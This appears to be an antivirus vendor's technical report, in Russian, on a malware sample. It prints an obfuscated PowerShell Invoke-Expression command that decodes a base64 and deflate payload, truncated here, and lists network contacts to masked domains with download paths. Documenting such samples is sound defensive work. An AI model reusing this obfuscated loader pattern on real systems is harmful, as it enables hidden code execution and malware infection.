Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $pShomE[21]+$pSHOME[30]+'X') ( NEW-obJeCt SYsteM.io.STReamreAdeR((NEW-obJeCt IO.cOmpressiOn.dEfLatestREam( [sySTeM.IO.MEmoryStReam][CoNVErT]::fROmBAsE64StRiNG('VY9RS8MwFIX/Sh4KWalNVHxxoTC...
Сетевая активность
Подключается к
- 'wi###ete.com':80
- 'al##mums.ru':80
- 'al##mums.ru':443
- 'st####ctory-era.ru':80
- 'st####ctory-era.ru':443
- 'ai#.org.pe':80
- 'ai#.org.pe':443
TCP
Запросы HTTP GET
- http://wi###ete.com/tWM/
- http://al##mums.ru/L/
- http://www.st####ctory-era.ru/c2Wq/
- http://www.ai#.org.pe/p/
Другие
- 'al##mums.ru':443
- 'st####ctory-era.ru':443
- 'ai#.org.pe':443
UDP
- DNS ASK wi###ete.com
- DNS ASK al##mums.ru
- DNS ASK st####ctory-era.ru
- DNS ASK ai#.org.pe
- DNS ASK c9###talk.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' . ( $pShomE[21]+$pSHOME[30]+'X') ( NEW-obJeCt SYsteM.io.STReamreAdeR((NEW-obJeCt IO.cOmpressiOn.dEfLatestREam( [sySTeM.IO.MEmoryStReam][CoNVErT]::fROmBAsE64StRiNG('VY9RS8MwFIX/Sh4KWalNVHxxoTC...' (со скрытым окном)
